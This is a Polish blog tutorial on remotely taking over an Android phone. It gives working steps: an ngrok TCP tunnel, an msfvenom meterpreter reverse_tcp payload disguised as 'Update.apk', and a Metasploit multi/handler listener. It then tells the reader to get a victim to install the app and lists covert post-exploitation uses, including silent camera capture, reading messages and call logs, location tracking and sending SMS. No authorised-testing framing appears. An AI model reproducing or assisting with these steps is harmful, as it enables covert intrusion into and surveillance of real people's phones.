Hacking Android Device [Remotely]

Hacking over WAN

Możesz sprawdzić mój Video-tutorial na youtube tutaj:
https://youtu.be/Bbp-AcejtHI

Zazwyczaj w WAN, po pierwsze musisz mieć Statyczny IP/Hostname i po drugie, musisz zrobić Port Forwarding aby pozwolić na przesyłanie ruchu, i wszyscy wiemy że oba są tak trudne w czasie rzeczywistym jak mamy ograniczony dostęp do portów w sieci.

Więc, co zrobimy w tym scenariuszu, skonfigurujemy bezpieczny tunel używając Ngrok.

Ngrok jest systemem tunelowania reverse proxy, który ustanawia tunele z publicznego punktu końcowego tj. internetu do lokalnie działającej usługi sieciowej. To może pomóc nam stworzyć publiczny URL HTTP/HTTPS dla strony internetowej działającej lokalnie w naszej maszynie. Nie musimy robić żadnego rodzaju przekierowania portów podczas korzystania z Ngrok, a nasza usługa sieciowa będzie ostatecznie eksponowana do Internetu za pomocą tunelowania TCP.

Postępuj zgodnie z tymi krokami, aby kontynuować:

Krok1: Zarejestruj się na koncie Ngrok, aby go pobrać.

Po pierwsze, będziesz musiał zarejestrować się na koncie Ngrok, po czym wyświetli się okno pobierania.

Okno rejestracji Ngrok

Po zarejestrowaniu się, można pobrać Ngrok dla systemu Linux.

Po prostu rozpakuj pobrany plik.

Krok 2: Podłącz swoje konto

Wykonanie tego polecenia spowoduje dodanie twojego auth tokena do domyślnego ngrok.yml pliku konfiguracyjnego. To da ci dostęp do większej ilości funkcji i dłuższych czasów sesji. (Musisz skopiować i wkleić swój własny token tutaj podany na ekranie głównym ngrok po zalogowaniu)

./ngrok authtoken <twoj token>

Teraz jesteś gotowy do użycia tego narzędzia. Otwórz swój terminal przejdź do katalogu, w którym rozpakowałeś narzędzie Ngrock i wpisz:

./ngrok tcp

wybierz numer portu, na którym chcesz nawiązać połączenie (tutaj, wybrałem 5555 jako numer portu). Po naciśnięciu enter, pojawi się ekran jak poniżej.

Przekierowanie tutaj określa tunel TCP, który ngrok utworzył. Połączenie zostało nawiązane z localhost na porcie 5555. Teraz musimy wygenerować złośliwy payload używając msfvenom.

Krok 3: Generowanie Payload

Możesz to zrobić otwierając nowy Terminal w twojej maszynie Kali Linux i następnie wpisując następujący kod.

msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=15787 R> .apk

Pamiętajmy jednak, że tym razem jest to nieco inny atak niż ten, który przeprowadzaliśmy w sieci LAN. Tutaj w miejsce adresu IP będziemy musieli wpisać link Forwarding podany w ngrok (2.tcp.ngrok.io). Natomiast numer portu będzie wynosił 15787. Pamiętaj, że ważne jest, aby wprowadzić ten sam numer portu podany przez Ngrok w przekierowaniu portu.

Uwaga: Jeśli wprowadzenie adresu IP jako 2.tcp.ngrok.io nie działa, możesz zastąpić go adresem IP, który można uzyskać za pomocą polecenia „ping”.
Otwórz terminal i wpisz ping 2.tcp.ngrok.io i naciśnij enter. Otrzymasz adres IP, który musisz umieścić w miejscu LHOST.

Tutaj użyłem „Update.apk” jako nazwy pliku dla naszego payload. Ten plik ma być zainstalowany w urządzeniu Android naszego celu. Ale przed zainstalowaniem tego pliku, musimy ustawić naszego listenera. Aby to zrobić, wykonaj krok 4.

Krok4: Set-Up a Listener

Otwórz terminal i załaduj konsolę Metasploit, wpisując: msfconsole
Po jej załadowaniu (po kilku sekundach), załaduj multi-handler exploita wpisując:

use exploit/multi/handler

Teraz ustaw reverse payload wpisując:

set payload android/meterpreter/reverse_tcp

Ustaw swój LHOST jako 0.0.0.0 i LPORT jako 5555
(numer portu powinien być taki sam jak numer portu, który został użyty do powiązania połączenia w ngrok)

set LHOST 0.0.0.0
set LPORT 5555

Na koniec, wpisz exploit aby uruchomić listener.

Tryb nasłuchiwania jest włączony

Krok 5: Zainstaluj plik Malicious Update.apk w urządzeniu docelowym

Pozwól ofierze zainstalować aplikację i uruchom ją zaraz po zainstalowaniu. Kiedy ofiara dotyka opcji Otwórz aplikację, otrzymasz dostęp do wszystkich funkcji urządzenia android. Jednakże, nic nie będzie wyświetlane na ekranie urządzenia po app dostaje otwarte.

Post-Exploitation

Typ help, aby zobaczyć różne opcje, których możesz użyć do wykonania różnych zadań na urządzeniu ofiary.
Możesz uzyskać dostęp do ich aparatu i zrobić zdjęcie bez powiadamiania ich. Możesz sprawdzić ich wiadomości, dzienniki połączeń i zapisać je w swoim systemie, jak również.
Możesz również przeglądać i otwierać każdą aplikację zainstalowaną na ich urządzeniu. Możesz nawet uzyskać aktualne współrzędne lokalizacji użytkownika.
Możesz również wysyłać wiadomości na dowolny numer kontaktowy za pośrednictwem ich urządzenia.

.

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany.